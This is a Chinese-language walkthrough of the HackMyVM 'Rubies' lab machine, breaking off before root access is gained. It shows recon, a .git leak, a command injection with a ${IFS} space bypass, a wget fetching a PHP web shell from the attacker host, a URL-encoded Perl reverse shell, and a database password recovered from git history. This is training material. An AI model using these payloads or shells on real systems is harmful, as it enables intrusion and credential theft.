19.rubies

dg-publish:
  - "true"
tags:
  - HMV
  - ruby操作
  - 空格绕过
  - 文件替换
  - git利用
难度: ⭐️⭐️⭐️⭐️
作者: ch4rm
系统: Linux

1. 基本信息^toc

靶机链接：https://hackmyvm.eu/machines/machine.php?vm=Rubies

作者： ch4rm

难度：⭐️⭐️⭐️⭐️

知识点：ruby操作、空格绕过、文件替换、git利用

2. 信息收集

nmap -sC -sV -p- 192.168.56.12
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-18 19:34 CST
Nmap scan report for 192.168.56.12
Host is up (0.00023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 54:65:0b:7a:f3:5c:2f:1f:14:9e:bb:0e:44:0c:af:29 (RSA)
|   256 1f:5d:63:05:65:f7:cf:70:e4:0d:0a:45:80:77:50:2c (ECDSA)
|\_  256 69:a2:0f:83:dc:19:f2:c1:72:9c:a3:f8:09:44:3e:36 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|\_http-title: Cute Cat Only
|\_http-server-header: Apache/2.4.18 (Ubuntu)
| http-git:
|   192.168.56.12:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|\_    Last commit message: Why minnie?
MAC Address: 08:00:27:14:E7:BF (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux\_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.31 seconds

主页

这里有两个按钮还有一个next ，next会显示一些关于猫咪的故事

扫下目录

两个利用点，git泄露与文件上传

2.1. git泄露

python2 GitHack.py http://192.168.56.12/.git/
[+] Download and parse index file ...
bg/bg.gif
index.php
poems/poem1
poems/poem2
poems/poem3
poems/poem4
poems/poem5
uploads/cat1.gif
uploads/cat2.jpg
[OK] index.php
[Error] [Error 183] : u'192.168.56.12\\poems'
[Error] [Error 183] : u'192.168.56.12\\poems'
[OK] poems/poem1
[OK] poems/poem4
[OK] poems/poem5
[OK] uploads/cat2.jpg
[OK] poems/poem2
[OK] poems/poem3
[OK] uploads/cat1.gif
[OK] bg/bg.gif

没啥东西

2.2. 文件上传

发现有文件上传的按钮但是是点不了的

这多半是本地js控制的修改一下

将disable删掉

这样就可以上传文件了

这里我上传了一个文件，但是发现不在uploads目录下，或者文件名字被改掉了

这里利用Githack获取一下文件目录，看看我的文件上传到哪里了

python2 GitHack.py http://192.168.56.12/.git/

 Upload functionality is currently disabled because Minnie messed up the code, lemme provide you with cute poems for the time being

上传功能目前暂时无法使用，因为 Minnie 把代码弄坏了。
让我先为你提供一些可爱的诗句吧！

获取到一个用户名字

Minnie

3. 代码审计 RCE利用

打开index.php，审计发现这里存在一个Rce漏洞

用d盾也能扫出来

差不多就是这样

<?php echo $input ?>

$input是我们可以控制的。传入参数是poem

尝试Rce发现有waf

再回去看下代码

过滤了空格

这个绕过用${IFS}即可

这里不太好直接弹shell

我们先传一个系统马上去

<?php system($\_POST['cmd']);
echo "ok"?>

http://192.168.56.12/index.php?poem=;wget${IFS}http://192.168.56.6/shell.php

然后弹shell

cmd=perl%20-e%20'use%20Socket%3B%24i%3D%22192.168.56.6%22%3B%24p%3D1122%3Bsocket(S%2CPF\_INET%2CSOCK\_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr\_in(%24p%2Cinet\_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B'

4. 提权

提权检测

(remote) www-data@rubies:/home/minnie$ /sbin/getcap -r / 2>/dev/null
/usr/bin/systemd-detect-virt = cap\_dac\_override,cap\_sys\_ptrace+ep
/usr/bin/traceroute6.iputils = cap\_net\_raw+ep
/usr/bin/mtr = cap\_net\_raw+ep

(remote) www-data@rubies:/var/www/html/uploads$ find / -perm -4000 2>/dev/null
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/x86\_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/at
/bin/ping
/bin/ping6
/bin/mount
/bin/fusermount
/bin/su
/bin/umount

看下用户目录下的提示

(remote) www-data@rubies:/home/minnie$ cat note.txt
Put anything you'd like to in the folder,
do not do dumb stuff pls

“可以把任何你想要的东西放进这个文件夹里，
请不要做蠢事，谢谢。”

意思是我们可以放任何东西到这个目录下

那我们是不是可以放我们的公钥呢

(remote) www-data@rubies:/home$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Nov  2  2020 .
drwxr-xr-x 23 root root 4096 Nov  2  2020 ..
drwxr-xr-x  2 root root 4096 Nov  2  2020 minnie

骗子啊。没有写入权限

还是看看提权吧

/usr/bin/systemd-detect-virt = cap\_dac\_override,cap\_sys\_ptrace+ep
/usr/bin/traceroute6.iputils = cap\_net\_raw+ep
/usr/bin/mtr = cap\_net\_raw+ep

好像没有什么可以利用的

5. git再利用

之前利用githack获取到了其中的Git目录下的一些文件

查看大佬的wp发现还有个GitTools工具

利用这个工具可以获取到包含一些凭据的历史记录...

/home/gitTools-v0.0.1/Dumper/gitdumper.sh http://192.168.56.12/.git/ git
cd /home/gitTools-v0.0.1/Dumper/git/.git
 git show HEAD
commit 052a0cb4865e29bc03278105e0232b20173f933d (HEAD -> master)
Author: Your Name <root@rubies.com>
Date:   Mon Nov 2 14:27:16 2020 +0800

    Why minnie?

diff --git a/index.php b/index.php
index 41f0f2f..d33ca0d 100644
--- a/index.php
+++ b/index.php
@@ -8,33 +8,6 @@ if(isset($\_GET['poem'])){
                $output = shell\_exec("cat poems/".$input);
        }
 }
-
-
-// we dont need a login page dangit minnie! follow my orders pls
-$servername = "localhost";
-$username = "root";
-$password = "jd92khn49w";
-
-$conn = new mysqli($servername, $username, $password);
-
-if ($conn->connect\_error) {
-  die("Connection failed: " . $conn->connect\_error);
-}
-
-$login\_username=$\_POST['username'];
-$login\_password=$\_POST['password'];
-
-$sql = "SELECT \* FROM users WHERE Username = '$login\_username' AND Password = '$login\_password' ";
-$result = mysqli\_query($con,$sql);
-
-if(sqmli\_num\_rows($result)<1){i
-       $\_SESSION['login']=$user\_id;
-       header('Location: http://ch4rm.pw/dashboard');
-}
-else{
-       $error = True;
-}
-
 ?>

 <html>
(END)

这里获取到一个密码

jd92khn49w

经过尝试这是minnie用户的密码

6. 再提权root

su到minnie后发现minnie用户是一个Ruby Interactive shell （irb）

使用命令切换到一个bash shell

system("bash")

H0wc00l\_i5\_Byp@@s1n9

上面的几个提权检测没有东西

我们用pspy64看一下

2024/11/18 21:58:01 CMD: UID=0    PID=2681   | /bin/sh -c /usr/bin/ruby /root/bundle.rb
2024/11/18 21:58:01 CMD: UID=0    PID=2680   | /bin/sh -c /usr/bin/ruby /root/bundle.rb
2024/11/18 21:58:01 CMD: UID=0    PID=2679   | /usr/sbin/CRON -f
2024/11/18 21:58:01 CMD: UID=0    PID=2682   | /bin/sh /sbin/dhclient-script
2024/11/18 21:58:01 CMD: UID=0    PID=2687   | /bin/sh /sbin/resolvconf -a enp0s3.dhclient
2024/11/18 21:58:01 CMD: UID=0    PID=2685   | /bin/sh /sbin/resolvconf -a enp0s3.dhclient
2024/11/18 21:58:01 CMD: UID=0    PID=2693   | /usr/bin/ruby /root/bundle.rb

发现其每隔一段时间会运行一个ruby的脚本bundle.rb

 /bin/sh -c /usr/bin/ruby /root/bundle.rb

但是我们好像办法控制这个ruby脚本